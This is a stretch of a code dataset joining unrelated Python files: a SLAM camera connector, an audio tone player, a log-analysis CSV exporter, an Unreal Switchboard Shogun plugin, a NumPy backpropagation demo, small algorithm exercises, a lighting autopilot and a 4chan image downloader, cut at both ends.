self.socket.setsockopt(zmq.SNDTIMEO, 1000)\n # 要求如果没有建立链接,立刻返回\n self.socket.setsockopt(zmq.IMMEDIATE, True)\n # 要求应答序号要一一对应\n self.socket.setsockopt(zmq.REQ_CORRELATE, True)\n # 要求不严格轮换\n self.socket.setsockopt(zmq.REQ_RELAXED, True)\n\n self.socket.connect('tcp://%s' % self.slam_server_address)\n while self.offline:\n try:\n print('orbslam2_connector: try say hello to slam server')\n self.socket.send(bytes(np.array([-1], np.int32)))\n data = self.socket.recv()\n if len(data) == 4:\n data = int(np.frombuffer(data, np.int))\n if data == -1:\n print('orbslam2_connector: connect success')\n self.offline = False\n continue\n print('wrong data')\n except zmq.error.Again:\n print('orbslam2_connector: connect out of time, will try again')\n\n\n def get_pos(self, imgLR):\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n assert imgLR.shape == (360, 1280, 3)\n\n ts = time.time() - self.start_time\n ts = int(ts*1000)\n mtype = bytes(np.array([1], np.int32))\n timestamp = bytes(np.array([ts], np.int32))\n imcode = bytes(cv2.imencode('.jpg', imgLR)[1])\n imcode_len = bytes(np.array([len(imcode)], np.uint32))\n msg = mtype + timestamp + imcode_len + imcode\n\n try:\n self.socket.send(msg, copy=False)\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功发送\n if self.offline:\n print('orbslam2_connector: found offline when send data')\n return False, None\n\n try:\n data = self.socket.recv()\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功接收\n if self.offline:\n print('orbslam2_connector: found offline when recv data')\n return False, None\n\n if len(data) != 76:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n mtype = np.frombuffer(data[0:4], np.int32)[0]\n slam_status = np.frombuffer(data[4:8], np.int32)[0]\n rel_mat = np.frombuffer(data[8:72], np.float32).reshape([4, 4])\n restart_count = np.frombuffer(data[72:76], np.int32)[0]\n\n if mtype != 1:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n if slam_status != self._SLAM_OK:\n print('SLAM is not OK')\n return False, None\n\n return restart_count, rel_mat\n\n def get_restart_count(self):\n pass\n\n def get_status(self):\n pass\n\n\nif __name__ == '__main__':\n osc = OrbSlam2Connector()\n cam1 = imageio.get_reader('', size=(1280, 720))\n cam2 = imageio.get_reader('', size=(1280, 720))\n\n # 读取相机参数\n stereo_cam_params_file = 'stereo_cam_params_imx322_1280x720.yml'\n f = cv2.FileStorage(stereo_cam_params_file, cv2.FILE_STORAGE_READ)\n matL = f.getNode('LM').mat()\n distL = f.getNode('LD').mat()\n matR = f.getNode('RM').mat()\n distR = f.getNode('RD').mat()\n R = f.getNode('R').mat()\n T = f.getNode('T').mat()\n hw = np.array([720, 1280])\n f.release()\n\n # 设定立体矩阵\n wh = tuple(hw[::-1])\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = \\\n cv2.stereoRectify(matL, distL, matR, distR,\n wh, R, T, flags=cv2.CALIB_ZERO_DISPARITY, alpha=-1, newImageSize=wh)\n\n mapL1, mapL2 = cv2.initUndistortRectifyMap(matL, distL, R1, P1, wh, cv2.CV_16SC2)\n mapR1, mapR2 = cv2.initUndistortRectifyMap(matR, distR, R2, P2, wh, cv2.CV_16SC2)\n\n while True:\n imgL = cam1.get_next_data()\n imgR = cam2.get_next_data()\n\n imgL = cv2.rotate(imgL, cv2.ROTATE_180)\n imgR = cv2.rotate(imgR, cv2.ROTATE_180)\n\n # 校畸\n imgL = cv2.remap(imgL, mapL1, mapL2, cv2.INTER_LINEAR)\n imgR = cv2.remap(imgR, mapR1, mapR2, cv2.INTER_LINEAR)\n # imgL = cv2.resize(imgL, (640, 360), cv2.INTER_AREA)\n # imgR = cv2.resize(imgR, (640, 360), cv2.INTER_AREA)\n\n imgLR = np.concatenate([imgL, imgR], 1)\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n im_show = cv2.cvtColor(imgLR, cv2.COLOR_RGB2BGR)\n cv2.imshow('view', im_show)\n s, m = osc.get_pos(imgLR)\n print(s)\n cv2.waitKey(1000//30)\n\n","repo_name":"One-sixth/smart_car","sub_path":"orbslam2_connector.py","file_name":"orbslam2_connector.py","file_ext":"py","file_size_in_byte":5360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21457611523","text":"# import time\n# import math\n# import pyaudio\n# from cffi.backend_ctypes import xrange\n#\n#\n# class Beeper(object):\n#\n# def __init__(self, **kwargs):\n# self.bitrate = kwargs.pop('bitrate', 16000)\n# self.channels = kwargs.pop('channels', 1)\n# self._p = pyaudio.PyAudio()\n# self.stream = self._p.open(\n# format = self._p.get_format_from_width(1),\n# channels = self.channels,\n# rate = self.bitrate,\n# output = True,\n# )\n# self._queue = []\n#\n# def __enter__(self):\n# return self\n#\n# def __exit__(self, exc_type, exc_val, exc_tb):\n# self.stream.stop_stream()\n# self.stream.close()\n#\n# def tone(self, frequency, length=1000, play=False, **kwargs):\n#\n# number_of_frames = int(self.bitrate * length / 1000.)\n#\n# record = False\n# x = 0\n# y = 0\n# while 1:\n# x += 1\n# v = math.sin(x / ((self.bitrate / float(frequency)) / math.pi))\n#\n# # Find where the sin tip starts.\n# if round(v, 3) == +1:\n# record = True\n#\n# if record:\n# self._queue.append(chr(int(v * 127 + 128)))\n# y += 1\n# if y > number_of_frames and round(v, 3) == +1:\n# # Always end on the high tip of the sin wave to clips align.\n# break\n#\n# def play(self):\n# sound = ''.join(self._queue)\n# self.stream.write(sound)\n# time.sleep(0.1)\n#\n#\n# with Beeper(bitrate=88000, channels=2) as beeper:\n# i = 0\n# for f in xrange(1000, 800-1, int(round(-25/2.))):\n# i += 1\n# length = math.log(i + 1) * 250 / 2. / 2.\n# beeper.tone(frequency=f, length=int(length))\n# beeper.play()\n\nimport numpy\nimport pyaudio\nimport math\nimport random\n\n\ndef sine(frequency, length, rate):\n length = int(length * rate)\n factor = float(frequency) * (math.pi * 2) / rate\n waveform = numpy.sin(numpy.arange(length) * factor)\n return waveform\n\n\ndef play_tone(stream, frequency, length, rate=44100):\n chunks = [sine(frequency, length, rate)]\n\n chunk = numpy.concatenate(chunks) * 0.25\n\n fade = 200\n\n fade_in = numpy.arange(0., 1., 1 / fade)\n fade_out = numpy.arange(1., 0., -1 / fade)\n\n chunk[:fade] = numpy.multiply(chunk[:fade], fade_in)\n chunk[-fade:] = numpy.multiply(chunk[-fade:], fade_out)\n\n stream.write(chunk.astype(numpy.float32).tostring())\n\n\ndef bassline():\n frequency = 300\n for i in range(1000000):\n play_tone(stream, frequency, .15)\n change = random.choice([-75, -75, -10, 10, 2, 3, 100, -125])\n print (frequency)\n if frequency < 0:\n frequency = random.choice([100, 200, 250, 300])\n else:\n frequency = frequency + change\n\nif __name__ == '__main__':\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,\n channels=1, rate=44100, output=4)\n\nbassline()","repo_name":"Andrew-Garanin/AudioDigitalFiltering","sub_path":"beeper.py","file_name":"beeper.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71710088730","text":"\n\nimport random\n\ndef classes(room_dim, periods):\n#room_dim = list of room dimensions for each room (e.g. seat length x seat width)\n#periods = number of time periods (student has n periods (classes) a day)\n\n #determine number of students (seats) in each room\n room_size = []\n for n in room_dim: #for each set of dim in room_dim\n room_size.append(n[0] * n[1]) #size = r * c\n\n #determine total number of students, generate list of students\n num_students = sum(room_size) #total number of students\n students = range(num_students) #list of student numbers\n\n #assign students to classes\n class_list = []\n for i in range(periods): #repeats for each period\n random.shuffle(students) #shuffle list of students randomly\n\n d = 0\n for n in room_size:\n class_list.append(students[d:d + n]) #increments of students depending on room size\n d += n #keeps track of start of block, depending on size of previous room\n\n return(class_list) #class list includes lists of each class, repeated for different periods\n\nprint(classes([[1,2],[3,4]], 2)) #example\n\n###Notes:\n #Need to figure out how to implement student object with determining neighbors\n #Class list is a list, need to change back to array based on room dim to figure out neighbors\n\n","repo_name":"zackmcnulty/math_381_project","sub_path":"project-381-master/scratchwork-code/class-assignments.py","file_name":"class-assignments.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34367335866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n@author: Jeff Gould\n\n@description: file operation functions for black lists.\n'''\n\n#from functions import var\nfrom functions import *\n\n\n\n\ndef file_ops(df, server):\n\n named_full_log = server + full_log\n named_ip = server + ip\n named_ok = server + ok\n named_reject = server + reject\n flog = os.path.join(created_logs_dir, named_full_log)\n fip = os.path.join(created_logs_dir, named_ip)\n fok = os.path.join(created_logs_dir, named_ok)\n freject = os.path.join(created_logs_dir, named_reject)\n\n try:\n # create csv of all relevant columns\n df.to_csv(flog, index=False)\n\n # create csv of unique Ip address' and the frequency they appear\n ip_count = pd.DataFrame(columns=['IP', 'Frequency'])\n ip_count.IP = df.IP\n ip_count = ip_count.groupby('IP').agg({'Frequency': len})\n ip_count = ip_count.sort_values(by=['Frequency'], ascending=False)\n\n ip_count.to_csv(fip, index=True)\n\n # create csv of all OK request code 200\n ip_ok = df.loc[df.Code == 200]\n ip_ok.to_csv(fok, index=False)\n\n # create csv of all rejected request not code 200\n ip_rej = df.loc[df.Code != 200]\n ip_rej.to_csv(freject, index=False)\n\n logging.info(\"From file_ops() CSV's have been Created\")\n\n\n except Exception as e:\n logging.error('From file_ops()' + str(e))\n","repo_name":"Gould25/IPprojoct3113","sub_path":"functions/io_ops.py","file_name":"io_ops.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27921404535","text":"from switchboard.config import CONFIG, Setting\nfrom switchboard.devices.device_base import Device, DeviceStatus\nfrom switchboard.devices.device_widget_base import DeviceWidget\nfrom switchboard.switchboard_logging import LOGGER\nimport switchboard.switchboard_utils as utils\n\nfrom PySide2 import QtWidgets\nfrom .thirdparty.vicon_core_api import vicon_core_api\nfrom .thirdparty.shogun_live_api import shogun_live_api\n\nimport datetime\nfrom functools import wraps\n\n\ndef unresponsive_shogun(f):\n \"\"\"\n Decorator to gracefully disconnect if a Shogun command comes back with vicon_core_api.client.RPCError\n \"\"\"\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except vicon_core_api.client.RPCError:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n return None\n except ModuleNotFoundError:\n LOGGER.error('Could not connect to Shogun because the module was not installed')\n return None\n\n return wrapped\n\n\nclass DeviceShogun(Device):\n def __init__(self, name, ip_address, **kwargs):\n self.setting_save_path = Setting(\"save_path\", \"Save Path\", \"\")\n super().__init__(name, ip_address, **kwargs)\n\n self.trigger_start = True\n self.trigger_stop = True\n\n self.client = None\n\n self._slate = 'slate'\n self._take = 1\n\n def device_settings(self):\n return super().device_settings() + [self.setting_save_path]\n\n @property\n def save_path(self):\n return self.setting_save_path.get_value()\n\n @save_path.setter\n @unresponsive_shogun\n def save_path(self, value):\n if self.setting_save_path.get_value() == value:\n return\n\n self.setting_save_path.update_value(value)\n\n self.set_capture_folder()\n\n @unresponsive_shogun\n def connect_listener(self):\n super().connect_listener()\n\n self.client = vicon_core_api.Client(self.ip_address)\n self.capture_service = shogun_live_api.CaptureServices(self.client)\n\n if self.client.connected:\n self.status = DeviceStatus.READY\n self.set_capture_folder()\n else:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n\n\n @unresponsive_shogun\n def set_slate(self, value):\n self._slate = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_take(self, value):\n self._take = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_capture_folder(self):\n d = datetime.date.today()\n\n save_path = d.strftime(self.save_path)\n\n # HOW TO MAKE DIR ON OTHER MACHINE\n #os.makedirs(save_path, exist_ok=True)\n\n result = self.capture_service.set_capture_folder(save_path)\n\n if result != vicon_core_api.result.Result.Ok:\n LOGGER.error(f'{self.name}: \"{save_path}\" is an invalid path. Capture Folder not set')\n\n @unresponsive_shogun\n def record_start(self, slate, take, description):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_start:\n return\n\n self.set_slate(slate)\n self.set_take(take)\n\n result, _ = self.capture_service.start_capture()\n\n if result == vicon_core_api.result.Result.Ok:\n self.record_start_confirm(self.timecode())\n\n @unresponsive_shogun\n def record_stop(self):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_stop:\n return\n\n result = self.capture_service.stop_capture(0)\n\n import time\n time.sleep(3)\n\n if result == vicon_core_api.result.Result.Ok:\n # TODO: THIS BLOCKS THE MAIN THREAD ON STOP. FIX THIS\n result, _, _ = self.capture_service.latest_capture_file_paths()\n # START HERE: GET PATHS OF FILES WRITTEN\n #LOGGER.debug(f'{result} {paths}')\n self.record_stop_confirm(self.timecode(), paths=None)\n\n def timecode(self):\n return '00:00:00:00'\n\n\nclass DeviceWidgetShogun(DeviceWidget):\n def __init__(self, name, device_hash, ip_address, icons, parent=None):\n super().__init__(name, device_hash, ip_address, icons, parent=parent)\n\n def _add_control_buttons(self):\n super()._add_control_buttons()\n self.trigger_start_button = self.add_control_button(':/icons/images/icon_trigger_start_disabled.png',\n icon_hover=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled=':/icons/images/icon_trigger_start_disabled.png',\n icon_on=':/icons/images/icon_trigger_start.png',\n icon_hover_on=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_start_disabled.png',\n tool_tip='Trigger when recording starts',\n checkable=True, checked=True)\n\n self.trigger_stop_button = self.add_control_button(':/icons/images/icon_trigger_stop_disabled.png',\n icon_hover=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled=':/icons/images/icon_trigger_stop_disabled.png',\n icon_on=':/icons/images/icon_trigger_stop.png',\n icon_hover_on=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_stop_disabled.png',\n tool_tip='Trigger when recording stops',\n checkable=True, checked=True)\n\n self.connect_button = self.add_control_button(':/icons/images/icon_connect.png',\n icon_hover=':/icons/images/icon_connect_hover.png',\n icon_disabled=':/icons/images/icon_connect_disabled.png',\n icon_on=':/icons/images/icon_connected.png',\n icon_hover_on=':/icons/images/icon_connected_hover.png',\n icon_disabled_on=':/icons/images/icon_connected_disabled.png',\n tool_tip='Connect/Disconnect from listener')\n\n self.trigger_start_button.clicked.connect(self.trigger_start_clicked)\n self.trigger_stop_button.clicked.connect(self.trigger_stop_clicked)\n self.connect_button.clicked.connect(self.connect_button_clicked)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n def trigger_start_clicked(self):\n if self.trigger_start_button.isChecked():\n self.signal_device_widget_trigger_start_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_start_toggled.emit(self, False)\n\n def trigger_stop_clicked(self):\n if self.trigger_stop_button.isChecked():\n self.signal_device_widget_trigger_stop_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_stop_toggled.emit(self, False)\n\n def connect_button_clicked(self):\n if self.connect_button.isChecked():\n self._connect()\n else:\n self._disconnect()\n\n def _connect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(True)\n\n # Enable the buttons\n self.trigger_start_button.setDisabled(False)\n self.trigger_stop_button.setDisabled(False)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_connect.emit(self)\n\n def _disconnect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(False)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_disconnect.emit(self)\n","repo_name":"chenyong2github/UnrealEngine","sub_path":"Engine/Plugins/VirtualProduction/Switchboard/Source/Switchboard/switchboard/devices/shogun/plugin_shogun.py","file_name":"plugin_shogun.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"30018700517","text":"\ndef larger_than_right(lst):\n y = max(lst)\n g = lst.index(y)\n newlist = lst[g:]\n newerList = []\n for i,v in enumerate(newlist[:-1]):\n if v > max(newlist[i+1:]):\n newerList.append(v)\n \n if len(newlist) > 1:\n if newlist[-2] > newlist[-1]:\n newerList.append(newlist[-1])\n \n if len(newerList) == 0:\n newerList.append(y)\n \n return newerList\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vC4P2jGR6wxED7MBL_15.py","file_name":"vC4P2jGR6wxED7MBL_15.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42503130578","text":"\n# O-\n# /\n# O - O-\n# \\ \n# O-\n\nimport numpy as np\n\ndvalues=np.array([[1.,1.,1.],\n [2.,2.,2.],\n [3.,3.,3.]])\n\nweights=np.array([[1.2,-2.4,-1.3,-4.2],\n [2.4,2.1,-5.2,4.8],\n [-1.1,1.8,6.1,-2.3]]).T\n\ndx0=sum(weights[0]*dvalues[0])\ndx1=sum(weights[1]*dvalues[0])\ndx2=sum(weights[2]*dvalues[0])\ndx3=sum(weights[3]*dvalues[0])\ndinputs=np.array([dx0,dx1,dx2,dx3])\n\n# print(dinputs)\n\ndinputs=np.dot(dvalues,weights.T)\n# print(\"dinputs\\n\",dinputs)\n\ninputs=np.array([[1.2,3.1,1.2,3.1],\n [3.2,5.2,6.7,1.7],\n [4.2,6.3,1.2,6.6]])\n\ndweights=np.dot(inputs.T,dvalues)\n# print(\"dweights\\n\",dweights)\n\ndbias=np.sum(dvalues,axis=0,keepdims=True)\n# print(\"dbias\\n\",dbias)\n\nbias=[1,1,1]\n\nz=np.dot(inputs,weights)+bias\n\ndrelu=np.zeros_like(z)\ndrelu[z>0]=1\ndrelu*=dvalues\n# print(\"drelu\\n\",drelu)\n\n# optimizing drelu calculation\ndrelu=dvalues.copy()\ndrelu[z<=0]=0\n# print(drelu)\n\n# MINIMIZING RELU OUTPUT\noutput=np.dot(inputs,weights)+bias\noutput=np.maximum(output,0)\nprint(output)\ndrelu=output.copy()\ndrelu[output<=0]=0\ndinput=np.dot(drelu,weights.T)\ndweights=np.dot(inputs.T,drelu)\ndbias=np.sum(output,axis=0,keepdims=True)\nweights -= 0.001*dweights\nbias -= 0.001*dbias\nprint(\"minimized output\\n\",np.maximum(np.dot(inputs,weights)+bias,0))\n","repo_name":"Pointdexter16/Neural-Network-concepts-from-scatch-in-python","sub_path":"9.Backpropagation_layer_of_neurons.py","file_name":"9.Backpropagation_layer_of_neurons.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15485254601","text":"\"\"\"\n动态规划\nhttps://leetcode.cn/problems/house-robber/description/?envType=study-plan-v2&envId=leetcode-75\n你是一个专业的小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,影响你偷窃的唯一制约因素就是相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。\n\n给定一个代表每个房屋存放金额的非负整数数组,计算你 不触动警报装置的情况下 ,一夜之内能够偷窃到的最高金额。\n\n\n示例 1:\n\n输入:[1,2,3,1]\n输出:4\n解释:偷窃 1 号房屋 (金额 = 1) ,然后偷窃 3 号房屋 (金额 = 3)。\n 偷窃到的最高金额 = 1 + 3 = 4 。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # if len(nums) == 0:\n # return 0\n\n # 分解成子问题\n \"\"\"\n f(k) = 偷[0..k)房间的最大金额\n f(0) = 0\n f(1) = nums[0]\n f(k) = max { rob(k-1), rob(k-2) + nums[k-1]}\n \"\"\"\n\n # n = len(nums)\n # dp = [0] * (n + 1)\n # dp[0] = 0\n # dp[1] = nums[0]\n pre = 0\n cur = 0\n # for i in range(2, n + 1):\n for i in nums:\n pre, cur = cur, max(cur,i+pre)\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i - 1])\n return cur\n\n\nif __name__ == '__main__':\n res = Solution().rob([1, 3, 4, 6])\n print(res)\n","repo_name":"ChenZixinn/leetcode","sub_path":"medium/动态规划/198_打家劫舍.py","file_name":"198_打家劫舍.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3608711009","text":"# Implement strStr().\n\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\n# Example 1:\n\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n\ndef strStr(haystack, needle):\n if not needle:\n return 0\n if needle not in haystack:\n return -1\n else:\n w = haystack.index(needle)\n\n return w\n\nhaystack = \"maxwell\"\nneedle = \"we\"\n\nprint(strStr(haystack,needle))","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/strStr_28.py","file_name":"strStr_28.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34616370508","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom loguru import logger # type:ignore\nfrom ravelights.core.bpmhandler import BeatStatePattern\nfrom ravelights.core.colorhandler import Color, ColorHandler\nfrom ravelights.core.device import Device\nfrom ravelights.core.settings import Settings\nfrom ravelights.core.utils import p\n\nif TYPE_CHECKING:\n from ravelights.core.ravelights_app import RaveLightsApp\n\n\n@dataclass\nclass AutoPilot:\n \"\"\"\n autopilot_loop_length [in beats]: randomized is called every n beats\n \"\"\"\n\n root: \"RaveLightsApp\"\n\n def __post_init__(self) -> None:\n self.settings: Settings = self.root.settings\n self.devices: list[Device] = self.root.devices\n\n self.settings.settings_autopilot = dict(\n autopilot=False,\n autopilot_loop_length=4,\n renew_pattern=True,\n p_renew_pattern=0.1, # use in timeline genselector\n renew_pattern_sec=True,\n p_renew_pattern_sec=0.1, # use in timeline genselector\n renew_vfilter=True,\n p_renew_vfilter=0.1, # use in timeline genselector\n renew_thinner=True,\n p_renew_thinner=0.1, # use in timeline genselector\n renew_dimmer=True,\n p_renew_dimmer=0.1, # use in timeline genselector\n color_primary=True,\n p_color_primary=0.1,\n timeline=True,\n p_timeline=0.1,\n alternate_pattern=True,\n p_alternate_pattern=0.1, # run on every item in selected seperately\n alternate_pattern_sec=True,\n p_alternate_pattern_sec=0.1, # run on every item in selected seperately\n triggers=True,\n p_triggers=0.1, # run on every item in selected seperately\n )\n\n def get_autopilot_controls(self):\n controls_autopilot = [\n dict(type=\"toggle\", name_toggle=\"autopilot\"),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern\",\n name_slider=\"p_renew_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern_sec\",\n name_slider=\"p_renew_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_vfilter\",\n name_slider=\"p_renew_vfilter\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_dimmer\",\n name_slider=\"p_renew_dimmer\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_thinner\",\n name_slider=\"p_renew_thinner\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"color_primary\",\n name_slider=\"p_color_primary\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"timeline\",\n name_slider=\"p_timeline\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern\",\n name_slider=\"p_alternate_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern_sec\",\n name_slider=\"p_alternate_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"triggers\",\n name_slider=\"p_triggers\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(type=\"slider\", name_slider=\"autopilot_loop_length\", range_min=4, range_max=32, step=4, markers=True),\n ]\n return controls_autopilot\n\n def get_color_palette(self):\n # ─── Add Controls Color Palette ───────────────────────────────\n n_colors = 11\n controls_color_palette = [\n ColorHandler.get_color_from_hue(hue) for hue in np.linspace(0, 1, n_colors + 1)[:-1]\n ] + [Color(1, 1, 1)]\n return [f\"rgb({int(r*255)},{int(g*255)},{int(b*255)})\" for (r, g, b) in controls_color_palette]\n\n def randomize(self) -> None:\n \"\"\"Called every frame to randomize parameters within ravelights app.\"\"\"\n\n if not self.settings.settings_autopilot[\"autopilot\"]:\n return None\n\n beat_pattern = BeatStatePattern(loop_length=self.settings.settings_autopilot[\"autopilot_loop_length\"])\n if not beat_pattern.is_match(self.settings.beat_state):\n return None\n\n logger.info(\"run randomize routine\")\n\n # ─── Colors ───────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"color_primary\"]:\n if p(self.settings.settings_autopilot[\"p_color_primary\"]):\n random_color = ColorHandler.get_random_color()\n logger.info(\"set new color_primary\")\n self.settings.color_engine.set_color_with_rule(color=random_color, color_key=\"A\")\n\n # ─── Triggers ─────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"triggers\"]:\n for gen_type in [\"pattern\", \"pattern_sec\", \"vfilter\", \"dimmer\", \"thinner\"]:\n for timeline_level in range(1, 4): # levels 1 to 4\n if p(self.settings.settings_autopilot[\"p_triggers\"]):\n logger.info(f\"renew_trigger {gen_type} {timeline_level}\")\n self.settings.renew_trigger(gen_type=gen_type, timeline_level=timeline_level)\n","repo_name":"danuo/chromalights","sub_path":"src/ravelights/core/autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40298769548","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport urllib\r\nimport re\r\nimport os\r\nimport sys\r\n\r\ndef get_soup(url):\r\n return BeautifulSoup(requests.get(url).text, \"lxml\")\r\n\r\ndef get_main_page(board):\r\n return get_soup(\"http://boards.4chan.org/{}/\".format(board))\r\n\r\ndef get_thread_page(board, thread_id):\r\n return get_soup(\"http://boards.4chan.org/{}/res/{}\".format(board, thread_id))\r\n\r\ndef get_thread_ids(board):\r\n main_page = get_main_page(board)\r\n thread_ids = []\r\n for link in main_page.find_all(\"a\", class_=\"replylink\"):\r\n thread_ids.append(link[\"href\"][1:])\r\n return thread_ids\r\n\r\ndef get_image_urls(thread_id):\r\n thread_page = get_thread_page(\"g\", thread_id)\r\n image_urls = []\r\n for post in thread_page.find_all(\"div\", class_=\"postContainer\"):\r\n for link in post.find_all(\"a\"):\r\n if link.has_attr(\"href\") and link[\"href\"].endswith(\"jpg\"):\r\n image_urls.append(link[\"href\"])\r\n return image_urls\r\n\r\ndef download_image(url, filename):\r\n print (\"Downloading {} to {}\".format(url, filename))\r\n urllib.urlretrieve(url, filename)\r\n\r\ndef download_images(board):\r\n thread_ids = get_thread_ids(board)\r\n for thread_id in thread_ids:\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n print (\"Usage: python 4chan.py []\")\r\n sys.exit(1)\r\n board = sys.argv[1]\r\n if len(sys.argv) > 2:\r\n thread_id = sys.argv[2]\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n else:\r\n download_images(board)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LeoEkky/OpenAI-Codex-Code-Generation","sub_path":"4chan search.py","file_name":"4chan search.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"74922126492","text":"import json as json_module\nfrom typing import List, Union, Optional, Dict\nfrom ctypes import c_void_p, c_char, c_char_p, byref, POINTER, create_string_buffer\n\nfrom ._object import Object\nfrom ._library import yogi_core\nfrom ._json_view import JsonView\nfrom ._enums import ConfigurationFlags, CommandLineOptions\n\n\nclass Configuration(Object):\n \"\"\"Stores program parameters from different sources.\n\n A configuration represents a set of parameters that usually remain constant\n throughout the runtime of a program. Parameters can come from different\n sources such as the command line or a file. Configurations are used for\n other parts of the library such as application objects, however, they are\n also intended to store user-defined parameters.\n \"\"\"\n\n def __init__(self, flags: ConfigurationFlags = ConfigurationFlags.NONE):\n \"\"\"Create a configuration.\n\n Args:\n flags: Flags for changing the configuration's behaviour.\n \"\"\"\n handle = c_void_p()\n yogi_core.YOGI_ConfigurationCreate(byref(handle), flags)\n 